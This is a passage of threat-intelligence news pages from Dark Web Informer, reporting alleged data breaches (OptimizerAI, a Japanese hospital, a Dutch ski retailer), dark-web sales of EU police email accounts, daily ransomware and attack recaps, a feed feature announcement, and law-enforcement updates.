platform, containing 1,983,503 rows in SQL format.](https://x.com/DarkWebInformer/status/2028929242587594881?s=20) ❗️ [Alleged unauthorized access to an industrial control system at a flour production facility in Israel](https://x.com/DarkWebInformer/status/2028933731319218245?s=20) ❗️ [BD Anonymous targeted the website of Ministry of Defense, State of Israel](https://x.com/DarkWebInformer/status/2028937782048018500?s=20) ❗️ [RuskiNet targets the website of KPMG Israel](https://x.com/DarkWebInformer/status/2028940074293878795?s=20) ❗️ [A threat actor has allegedly leaked 78K records from Universidad del Rosario, one of Colombia's oldest and most prestigious private universities, founded in 1653.](https://x.com/DarkWebInformer/status/2028940585613025600?s=20) ❗️ [500,000 PlayStation stealer log accounts leaked](https://x.com/DarkWebInformer/status/2028952131768553549?s=20) ❗️ [A threat actor has allegedly leaked a dataset of GPO.gov (U.S. Government Publishing Office), the federal agency responsible for producing, procuring, and disseminating official U.S. government publications.](https://x.com/DarkWebInformer/status/2028959682992148529?s=20) 💡 [Facebook, TikTok, BlueSky, Instagram, CapCut and Facebook Messenger are currently experiencing outages](https://x.com/DarkWebInformer/status/2028966002105413778?s=20) ❗️ [The .IN BreachForums domain was seized by the Dutch police via an abuse complaint and a MLAT according to HasanBroker.](https://x.com/DarkWebInformer/status/2028969851285299431?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### OptimizerAI Database Leaked With 118,000 User Records and 1.1 Million AI Generated Sounds URL: https://darkwebinformer.com/optimizerai-database-leaked-with-118-000-user-records-and-1-1-million-ai-generated-sounds/ Last updated: 2026-03-03T21:46:38.000Z Dark Web Informer - Cyber Threat Intelligence # OptimizerAI Database Leaked With 118,000 User Records and 1.1 Million AI Generated Sounds March 3, 2026 - 9:08:24 PM UTC ![USA](https://flagcdn.com/20x15/us.png)USA Technology / AI Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-03 21:08:24 UTC Threat Actor korea Victim Country ![USA](https://flagcdn.com/20x15/us.png)USA Industry Technology / AI Victim Organization OptimizerAI Victim Site optimizerai.xyz Category Data Leak Severity Medium Network Open Web Total Records 118,000+ ## Incident Overview A threat actor going by korea has leaked the full database of OptimizerAI, a popular AI sound effects generation platform. The breach reportedly occurred in February 2026 and exposed over 118,000 unique users, with the dataset containing over 118,000 unique email addresses. The full database has been made available as a free download behind a reply wall. The compromised data ties together users' Google accounts and Discord profiles in a single dataset. Fields include UIDs, Google email addresses, profile images, Discord IDs, Discord display names, Discord nicknames, Discord usernames, Discord profile images, Discord email addresses, account registration dates, and newsletter subscription status. All user-generated content on the platform was also included in the dump. In addition to user records, the leak includes over 1.1 million AI-generated sound effects that were produced through the platform, described by the threat actor as having been sold by the company. This represents both a user data exposure and a significant intellectual property leak for the platform. ## Compromised Data Categories User IDs (UIDs) Google Email Addresses Profile Images Discord IDs Discord Display Names Discord Nicknames & Usernames Discord Profile Images Discord Email Addresses Account Creation Dates Subscription Email Status All User Generations (1.1M+ Sounds) ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing OptimizerAI database leak with 118,000 user records](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/28656606417154513441.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/28656606417154513441.png) [![Sample data from OptimizerAI database leak](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/28656606417154513442.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/28656606417154513442.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Shiraume Hospital Patient Data Allegedly Leaked With Full Medical Records and PII URL: https://darkwebinformer.com/shiraume-hospital-patient-data-allegedly-leaked-with-full-medical-records-and-pii/ Last updated: 2026-03-03T21:23:50.000Z Dark Web Informer - Cyber Threat Intelligence # Shiraume Hospital Patient Data Allegedly Leaked With Full Medical Records and PII March 3, 2026 - 8:51:39 PM UTC ![Japan](https://flagcdn.com/20x15/jp.png)Japan Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-03 20:51:39 UTC Threat Actor NetRunnerPR Victim Country ![Japan](https://flagcdn.com/20x15/jp.png)Japan Industry Healthcare Victim Organization Shiraume Hospital (白梅病院) Victim Site Unknown Category Data Breach Severity Critical Network Open Web Total Records Unknown ## Incident Overview A threat actor going by NetRunnerPR claims to have breached the network of Shiraume Hospital (白梅病院) in Japan and extracted patient PII along with full medical records. The actor has announced that the complete database will be released on March 5, 2026, and has posted an extensive list of data columns as proof of the breach. The leaked field names paint a deeply concerning picture of the data involved. Patient records appear to include physical measurements (height, weight), allergy information, and infection statuses for serious conditions including Hepatitis B, Hepatitis C, HIV, MRSA, tuberculosis, CJD (Creutzfeldt-Jakob disease), and VRE. The dataset also contains detailed emergency contact information for up to three family members per patient, including names, ages, relationships, addresses, postal codes, and multiple phone numbers. Beyond medical and contact data, the breach reportedly includes financial and insurance information such as bank names, branch codes, account numbers, account types, and billing claim details. Treating physician names, department codes, hospital codes, diagnosis information, and insurance coverage fields are also listed among the extracted columns. ## Compromised Data Categories Patient IDs Physical Measurements (Height, Weight) Allergy Information Infection Statuses (HBV, HCV, HIV, MRSA, TB, CJD, VRE) Emergency Contact Names & Relationships Emergency Contact Addresses & Phone Numbers Banking Details (Bank Name, Branch, Account Number) Insurance & Billing Information Treating Physician Names Department & Hospital Codes Diagnosis Information Disability & Care Level Indicators Treatment Dates ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Shiraume Hospital patient data breach](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/84710454326074105451-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/84710454326074105451-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Ransomware Feed 2.0 - What's New URL: https://darkwebinformer.com/ransomware-feed-2-0-whats-new/ Last updated: 2026-03-03T18:07:20.000Z This feed isn't just for security researchers, it's for anyone who wants to stay on top of their privacy, protect their personal data, and keep their operational security (OPSEC) tight. --- Ransomware Feed 2.0 for Pro/Elite Subscribers: --- Here are just **some** of the high level new features: **Complete redesign** of the Ransomware Feed with a modern dark-themed interface, real-time data, and professional-grade intelligence tools. **Analytics Dashboard** \- Collapsible dashboard at the top with four metric cards (Total Incidents, Active Groups, Countries Affected, Sectors Targeted), each with sparkline charts. Seven full charts below: Top Groups, Incidents Timeline, Top Countries (doughnut with flag legend), Top Sectors, Weekly Trend, Group Activity Share, and Sector Breakdown Over Time. Every chart has a download-as-PNG button and time range toggles (7d / 30d / 60d / 90d / All). **Incident Heatmap** \- GitHub-style contribution grid showing daily incident volume over the past year with hover tooltips. **Global Incident Map** \- Interactive Leaflet map with circle markers sized and colored by incident concentration per country. Year filter buttons and click-to-open country profiles. **Trending Groups** \- Daily leaderboard of the most active groups with spike percentages compared to their 7-day average. **Emerging Groups Tracker** \- Shows groups that appeared for the first time within a selectable window (30d / 60d / 90d). **Country Risk Ranking** \- Sortable table ranking countries by a composite risk score based on 30-day volume, group diversity, and trend acceleration. **Three View Modes** \- Grid (card layout), List (compact rows), and Timeline (chronological feed), toggled from the control bar. **Whiteintel Infostealer Lookup** \- Each incident card includes a WhiteIntel button that checks the victim domain against WhiteIntel's infostealer database, showing whether compromised credentials or stealer logs exist for that organization. **Incident Cards** \- Each card shows victim name with site logo, group badge, threat level badge (Critical / High / Medium / Low based on 30-day group activity), discovery date, sector, country with flag, time-ago indicator, description with expand toggle, and screenshot. New incidents get a green glow highlight and a "NEW" badge. Action buttons: Details, Copy, Save (bookmark), Search, Group Intel, DNS, and WhiteIntel. **Screenshot System** \- Screenshots load via blob URLs. Lazy-loaded as you scroll, with cascading fallbacks.. Missing screenshots show an explanatory placeholder. **Detail Modal** \- Expanded view of any incident with all metadata, claim URL, related victims from the same group, domain intelligence (DNS records + WHOIS), IOC summary for the group, and full screenshot. Copy and share buttons (X, Telegram, LinkedIn, Email) with pre-formatted alert text. **Group Profiles** \- Click any group name to open a full intelligence modal with description, leak site onion URLs (with online/offline status and copy buttons), MITRE ATT&CK TTP tags with hover descriptions, activity charts, recent victims list, and IOC breakdown by type (hashes, IPs, domains, URLs) with search and copy-all. **Country Profiles** \- Click any country to see total incidents, active groups, top sectors, timeline chart, and recent victims. **Notification System** \- Slide-in panel with configurable alerts. Set watch groups, watch countries, and watch keywords. Browser notification support. Unread badge on the bell icon and in the page title. **Sector Alert Profile** \- Save sectors and countries of interest to get highlighted alerts when matching incidents appear. **Bookmarks / Watchlist** \- Save any incident to a persistent watchlist accessible from a slide-in panel. Clear all or remove individually. **Command Palette** \- Ctrl+K opens a quick-search overlay with keyboard navigation across all incidents. **Search & Filters** \- Full-text search across victims, groups, descriptions, and sectors. Dropdown filters for Group, Country, Sector, and Date Range (24h / 7d / 30d / 90d / 1y). Active filters shown as removable chips. **JSON & CSV Export** \- One-click export of the full dataset (daily limit applies). **Dark / Light Theme** \- Toggle between dark and light modes, persisted across sessions. All charts, map tiles, and panels adapt. **Timezone Selector** \- Choose from 75+ timezones organized by region. All dates across the feed update instantly. **Auto-Refresh** \- Feed checks for new data every 60 seconds with a visual countdown bar. New incidents animate in with highlights. **Stats Bar** \- Fixed bottom bar appears on scroll showing 24h / 7d / 30d claim counts and the top group. **Keyboard Shortcuts** \- Ctrl+K for command palette, `/` to focus search, Escape to close any modal or panel. **Mobile Responsive** \- Full breakpoint system adapting layout, chart sizes, and navigation for tablet and phone screens. ### Ransomware Groups URL: https://darkwebinformer.com/ransomware-groups/ Last updated: 2026-03-03T17:54:06.000Z _This post is for subscribers on the Pro and Elite tiers only._ ### Daily Dose of Dark Web Informer - March 2nd, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-2nd-2026/ Last updated: 2026-03-02T23:37:40.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [Alleged Sale of 81,000 Customer Records from Dutch Ski Retailer SkiWebShop](https://darkwebinformer.com/alleged-sale-of-81000-customer-records-from-dutch-ski-retailer-skiwebshop/) FREE ❗️ [Threat Actor Selling Compromised EU Police Email Accounts for $1,000 Each to Enable Fraudulent Emergency Data Requests](https://darkwebinformer.com/threat-actor-selling-compromised-eu-police-email-accounts-for-1000-each-to-enable-fraudulent-emergency-data-requests/) FREE 📰 [Project Compass Delivers First Operational Results Targeting The Com Network](https://darkwebinformer.com/project-compass-delivers-first-operational-results-targeting-the-com-network/) FREE 💡 [Ransomware Attack Update - March 2nd, 2026](https://darkwebinformer.com/ransomware-attack-update-march-2nd-2026/) FREE 💡 [Threat Attack Update - March 2nd, 2026](https://darkwebinformer.com/threat-attack-update-march-2nd-2026/) FREE X/Twitter Updates ❗️ [A threat actor on a hacking forum has allegedly leaked data from SISCONMP (Sistema de Información de Conductores que Transportan Mercancías Peligrosas), Colombia's information system for drivers who transport hazardous materials.](https://x.com/DarkWebInformer/status/2028466730566070517?s=20) ❗️ [A threat actor claims to have breached the database of Universidad de Investigación y Desarrollo (UDI).](https://x.com/DarkWebInformer/status/2028470942184116524?s=20) ❗️ [Conquerors Electronic Army targeted the website of Tzur Hadassah](https://x.com/DarkWebInformer/status/2028473036916019424?s=20) 💡 [Claude is currently down worldwide](https://x.com/DarkWebInformer/status/2028474067896893781?s=20) ❗️ [Fundação Getulio Vargas has fallen victim to DragonForce Ransomware](https://x.com/DarkWebInformer/status/2028477050927886663?s=20) ❗️ [Grupo D'Arc has been claimed a victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2028482714131706062?s=20) ❗️ [BD Anonymous targeted the website of EL AL Israel Airlines Ltd.](https://x.com/DarkWebInformer/status/2028492026807824888?s=20) ❗️ [Alleged leak of passports and birth certificates from Israel](https://x.com/DarkWebInformer/status/2028494790665314636?s=20) ❗️ [Eric Davis Dental has fallen victim to Gunra Ransomware](https://x.com/DarkWebInformer/status/2028497069959168015?s=20) ❗️ [A threat actor has allegedly leaked a Human Rights Monitoring Database, containing UN-related data on children's rights and statelessness across multiple countries.](https://x.com/DarkWebInformer/status/2028501591032991968?s=20) ❗️ [FAD Team claims to be targeting Qatar, Saudi Arabia, Bahrain, Jordan, Kuwait and UAE](https://x.com/DarkWebInformer/status/2028508669021675610?s=20) ❗️ [Martin & Cukjati, LLP has fallen victim to INC RANSOM Ransomware](https://x.com/DarkWebInformer/status/2028515015666323921?s=20) 💡 [How Linux Cron Job Works](https://x.com/DarkWebInformer/status/2028519165812777000?s=20) 💡 [GeoIntel: A Python tool using Google's Gemini API to uncover the location where photos were taken through AI-powered geo-location analysis.](https://x.com/DarkWebInformer/status/2028533745997828099?s=20) 💡 [Ransomware Feed 2.0 and the new Ransomware Groups page will be deployed sometime tomorrow. Code changes have already occurred and no screenshots will be showing on the old feed.](https://x.com/DarkWebInformer/status/2028560436270940489?s=20) ❗️ [Moroccon Black Cyber Army targeted the website of Roboteam Ltd](https://x.com/DarkWebInformer/status/2028569730584387891?s=20) 📰 [Project Compass Delivers First Operational Results Targeting The Com Network](https://x.com/DarkWebInformer/status/2028592799126331707?s=20) 💡 [February 25th, 2025 the threat feed had 277 alerts.](https://x.com/DarkWebInformer/status/2028597763831648752?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Threat Attack Update - March 2nd, 2026 URL: https://darkwebinformer.com/threat-attack-update-march-2nd-2026/ Last updated: 2026-03-02T23:13:43.000Z ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) ### Donations Support Dark Web Informer with cryptocurrency donations. [Donate](https://darkwebinformer.com/donations) --- Threat Recap # March 2, 2026 12:01 AM UTC 11:09 PM UTC expand all collapse all 285 Total Claims 25 Ransomware 42 Countries 👤Threat Actors93 - BABAYO EROR SYSTEM28 - Hax.or19 - Keymous Plus17 - Nicotine16 - NoName057(16)16 - FAD Team10 - PLAY9 - Qilin6 - 404 CREW CYBER TEAM6 - Cyber ​​Islamic resistance6 - Fatimion cyber team6 - Evil Markhors -Dark Side of Pakistan Alliance6 - Z-Net6 - L4663R666H05T6 - RipperSec5 - 313 Team4 - DieNet4 - ‏Conquerors Electronic Army4 - epi4 - NATION OF SAVIORS3 - Team insane Pakistan3 - Wadjet3 - VinzXmodz3 - Infrastructure Destruction Squad3 - HighRisk3 - BD Anonymous3 - Rayzky\_3 - ed1n1ca3 - Handala2 - HellR00ters Team2 - DARKSTORM UPDATE2 - INC RANSOM2 - The Red Eagle2 - NightSpire2 - GoodL7 PROOF2 - DragonForce2 - XZeeoneOfc2 - Akatsuki cyber team (official)2 - Everestgroup2 - Big-Bro2 - VIRTUALBANKSERVI1 - Emperorcvv1 - Dark Storm Team1 - kaareds1 - Raperdogan1 - Anonymous Algeria1 - LulzSec Black1 - ANONYMOUS SYRIA HACKERS1 - lucy1 - Moroccon Black Cyber Army1 - BravoX1 - IT ARMY OF RUSSIA1 - TimeoRakin1 - Russian Legion1 - Vassilx1 - ImVec41 - ShadowNex1 - YourDevExpert1 - Anonymous1 - HackHax1 - MORNING STAR1 - CVDEAD1 - OverFlame1 - TikusXploit1 - Payouts King1 - EXADOS1 - KINGSMAN SOCIAL WING1 - Gunra1 - Handala Hack1 - N0XV3RITAS1 - CinCauGhas1 - ForensicBoy1 - breezzaz1 - Heferi1 - MEDUSA1 - OriginalCrazyOldFart1 - bzaari1 - Kinda1 - THE GARUDA EYE1 - btCC1 - NyxarGroup1 - lllllllllllllllllili1 - Simsimi1 - 1H3X-TN1 - Z-PENTEST ALLIANCE1 - Komiko-chan1 - savel9871 - corptoday1 - delitospenales1 - chinafans1 - johnfelix7771 - AckLine1 - Cyb3r Drag0nz1 ⚡Attack Categories7 DDoS Attack93 Defacement66 Data Breach62 Ransomware25 Initial Access22 Alert14 Cyber Attack3 🌍Victim Countries42 - Israel67 - UAE44 - USA41 - Kuwait22 - India11 - France11 - Germany9 - Qatar9 - Indonesia8 - Iran7 - Unknown7 - UK4 - Turkey4 - Jordan3 - Brazil3 - Denmark2 - Philippines2 - Netherlands2 - Ukraine2 - Pakistan2 - Bangladesh2 - Colombia2 - Spain2 - Bahamas1 - Chile1 - Italy1 - Saudi Arabia1 - Switzerland1 - Vietnam1 - Bahrain1 - Syria1 - Oman1 - Japan1 - Egypt1 - South Korea1 - Palestine1 - Taiwan1 - Thailand1 - Australia1 - Argentina1 - Belarus1 - Russia1 🏭Victim Industries71 - Unknown45 - Government Administration34 - Education13 - Higher Education/Acadamia9 - Hospital & Health Care9 - E-commerce & Online Stores9 - Government & Public Sector8 - Information Technology (IT) Services8 - Real Estate8 - Broadcast Media6 - Oil & Gas5 - Banking & Mortgage5 - Network & Telecommunications5 - Building and construction5 - Law Practice & Law Firms5 - Retail Industry5 - Non-profit & Social Organizations5 - Transportation & Logistics5 - Financial Services4 - Research Industry4 - Food & Beverages4 - Management Consulting3 - Newspapers & Journalism3 - Social Media & Online Social Networking3 - Computer & Network Security3 - Defense & Space3 - Manufacturing & Industrial Products3 - Gambling & Casinos3 - Other Industry3 - Airlines & Aviation3 - Manufacturing3 - Packaging & Containers2 - Recreational Facilities & Services2 - Media Production2 - Machinery Manufacturing2 - Medical Equipment Manufacturing2 - Energy & Utilities2 - Online Publishing2 - Software Development2 - Automotive2 - Marketing, Advertising & Sales2 - Political Organization2 - Furniture2 - Events Services2 - Textiles2 - Entertainment & Movie Production1 - Military Industry1 - Information Services1 - Civic & Social Organization1 - Judiciary1 - Leisure & Travel1 - Professional Training1 - Graphic & Web Design1 - Architecture & Planning1 - Restaurants1 - Package & Freight Delivery1 - Luxury Goods & Jewelry1 - Think Tanks1 - Mechanical or Industrial Engineering1 - Agriculture & Farming1 - Sports1 - Human Resources1 - Insurance1 - Museums & Institutions1 - Hospitality & Tourism1 - Import & Export1 - Music1 - Facilities Services1 - Software1 - Supermarkets1 - Government Relations1 ### Ransomware Attack Update - March 2nd, 2026 URL: https://darkwebinformer.com/ransomware-attack-update-march-2nd-2026/ Last updated: 2026-03-02T23:02:50.000Z ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) ### Donations Support Dark Web Informer with cryptocurrency donations. [Donate](https://darkwebinformer.com/donations) --- 24 claims 9 groups 8 countries Ransomware Recap # March 2, 2026 12:01 AM – 11:59 PM UTC 24Claims 9Groups 8Countries PlayMost Active Group Activity ✕ Count A–Z Expand Collapse \= country not specified No matches found. ### Play 9 - Gordon/Clifford Realty - Cabka - The Kuker Group - LRA Constructors - Cobblestone Creek Country Club - Project Consulting Services - Go Professional Cases - WCC Technologies Group - Favaro Lavezzo Gill Caretti ### Qilin 4 - IDH Entertainment - Phoenix Systems - Akkök Holding - Grupo D'arc ### INC Ransom 3 - mcfirm.com - precisioncoating.com - Martin, Cukjati & Tom, LLP ### Nightspire 2 - Bain Oil Company - SIMETRI Inc ### DragonForce 2 - TIW Group - fgv.br ### Bravox 1 - Soreco ### Handala 1 - Israel Opportunity Energy ### Rhysida 1 - Southold Town Senior Services / Southold Police Department ### Anubis 1 - AkzoNobel ### Project Compass Delivers First Operational Results Targeting The Com Network URL: https://darkwebinformer.com/project-compass-delivers-first-operational-results-targeting-the-com-network/ Last updated: 2026-03-02T22:08:05.000Z In its inaugural year, Project Compass has produced tangible law enforcement outcomes against "The Com," a sprawling, decentralized extremist network that preys on minors and vulnerable people in both digital and physical spaces. The initiative operates under the coordination of Europol's European Counter Terrorism Centre and unites law enforcement agencies from across EU Member States alongside partners in Norway, Switzerland, the United Kingdom, the United States, Canada, Australia, and New Zealand. Its core mission is to bolster cross-border collaboration in the prevention, detection, and investigation of criminal activity tied to the network. The Com thrives within a fragmented online landscape, exploiting social media platforms, encrypted messaging apps, gaming environments, and music streaming services to recruit, radicalize, and exploit young people. Its lack of centralized leadership makes it highly adaptable and resistant to traditional disruption methods, demanding sustained and coordinated international action. **Operational Impact** Since launching in January 2025, Project Compass has contributed to the following results: - 4 victims safeguarded - 30 perpetrators arrested - 62 victims identified or partially identified - 179 perpetrators identified or partially identified - 9 joint awareness-raising activities conducted The project facilitates coordinated investigations, enables rapid responses to emerging threats, and provides a structured framework for operational intelligence sharing across 28 participating countries. ### Threat Actor Selling Compromised EU Police Email Accounts for $1,000 Each to Enable Fraudulent Emergency Data Requests URL: https://darkwebinformer.com/threat-actor-selling-compromised-eu-police-email-accounts-for-1-000-each-to-enable-fraudulent-emergency-data-requests/ Last updated: 2026-03-02T21:35:53.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling Compromised EU Police Email Accounts for $1,000 Each to Enable Fraudulent Emergency Data Requests March 2, 2026 - 8:37:12 PM UTC ![European Union](https://flagcdn.com/20x15/eu.png)European Union Law Enforcement / Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-02 20:37:12 UTC Threat Actor lucy Target Region ![European Union](https://flagcdn.com/20x15/eu.png)European Union Industry Law Enforcement / Government Category Threat Actor Service Price $1,000 USD / Account Severity Critical Network Open Web ## Incident Overview A threat actor using the handle lucy is selling compromised email accounts from police departments across first-world EU countries. Each account is priced at a flat $1,000 USD with no room for negotiation, and the actor specifically excludes accounts from Eastern European or lower-tier domains, claiming these are clean, fresh credentials from jurisdictions that major platforms actually respect and prioritize. The primary use case being marketed is submitting fraudulent emergency data requests (EDRs) to companies like Meta, Google, Telegram, WhatsApp, TikTok, and X. Buyers can also use the accounts to send formal legal notices, preservation letters, and subpoena-style demands, or to impersonate EU law enforcement investigators through social engineering. The actor emphasizes that a credible first-world EU police email significantly improves the speed and success rate of these requests compared to cheaper alternatives that tend to get flagged and blocked. Delivery includes the full credentials (email address and current password) along with a basic setup guide, handed over immediately after payment. For an extra $300, buyers can add a forged matching police ID in the form of a professional scan or PDF with correct details, useful as a backup when platforms request credential verification. Payment is accepted in BTC, LTC, ETH, SOL, USDT, and Monero, with the actor expressing a preference for Monero. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing EU police email accounts for sale at $1,000 each](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/46773406013331924182.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/46773406013331924182.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Sale of 81,000 Customer Records from Dutch Ski Retailer SkiWebShop URL: https://darkwebinformer.com/alleged-sale-of-81-000-customer-records-from-dutch-ski-retailer-skiwebshop/ Last updated: 2026-03-02T22:08:50.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Sale of 81,000 Customer Records from Dutch Ski Retailer SkiWebShop March 2, 2026 - 7:05:23 PM UTC ![Netherlands](https://flagcdn.com/20x15/nl.png)Netherlands E-Commerce / Retail Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-02 19:05:23 UTC Threat Actor Wadjet Victim Country ![Netherlands](https://flagcdn.com/20x15/nl.png)Netherlands Industry E-Commerce / Retail Victim Organization SkiWebShop Victim Site skiwebshop.nl Category Data Breach Severity High Network Open Web Total Records 81,436 ## Incident Overview A threat actor going by Wadjet is claiming to sell customer data from SkiWebShop, a Dutch online retailer specializing in ski and winter sports gear. The listing includes 81,436 unique email addresses and 70,020 unique phone numbers, with the data covering customers across multiple European countries. The breakdown by country shows the Netherlands making up the largest portion at 48,930 records, followed by Germany with 16,792, Belgium with 6,910, Poland with 2,272, the United Kingdom with 1,482, and Austria with 1,193\. The dataset contains detailed billing information including full names, phone numbers, street addresses, cities, postcodes, regions, country IDs, VAT IDs, and company names, along with account-level fields like dates of birth, gender, email confirmation status, and account creation details. The threat actor has posted a redacted sample and is accepting escrow for the transaction, suggesting they are open to negotiated pricing through the forum's built-in escrow service. ## Compromised Data Categories Full Names Email Addresses Phone Numbers Billing Addresses (Street, City, Postcode, Region) Country IDs Dates of Birth Gender Tax / VAT IDs Billing Company Names Shipping Information Email Confirmation Status Account Creation Details ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing SkiWebShop customer data for sale with 81,436 unique emails](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/51324113032459438150-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/51324113032459438150-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Chilean National Extradited to the U.S. for Trafficking Over 26,000 Stolen Credit Cards via Telegram URL: https://darkwebinformer.com/chilean-national-extradited-to-the-u-s-for-trafficking-over-26-000-stolen-credit-cards-via-telegram/ Last updated: 2026-02-26T21:10:53.000Z A 24-year-old Chilean national has been extradited to the United States to face federal charges for allegedly running an illegal online card shop that sold tens of thousands of stolen credit card numbers through Telegram channels. Alex Rodrigo Valenzuela Monje, known online as "VAL4K," was arraigned on February 26, 2026, in Salt Lake City after being extradited from Chile the day prior. He was originally charged under a sealed indictment by a federal grand jury in August 2023, and entered a not-guilty plea to charges of trafficking in unauthorized access devices and unlawful transfer of means of identification. ## The Operation According to court documents, Valenzuela Monje ran illegal Telegram-based carding channels from at least May 2021 through August 2023\. The channels, known as **MacacoCC Collective** and **Novato Carding,** offered stolen payment card data covering virtually all U.S. payment card brands. For just one credit card brand alone, investigators allege he trafficked stolen data for approximately **26,528 cards**. The dumps he sold typically included the full account number, card type, cardholder name, CVV/CVC, and expiration date. ## Extradition Timeline The path to extradition was a lengthy one. After the sealed indictment in August 2023, the 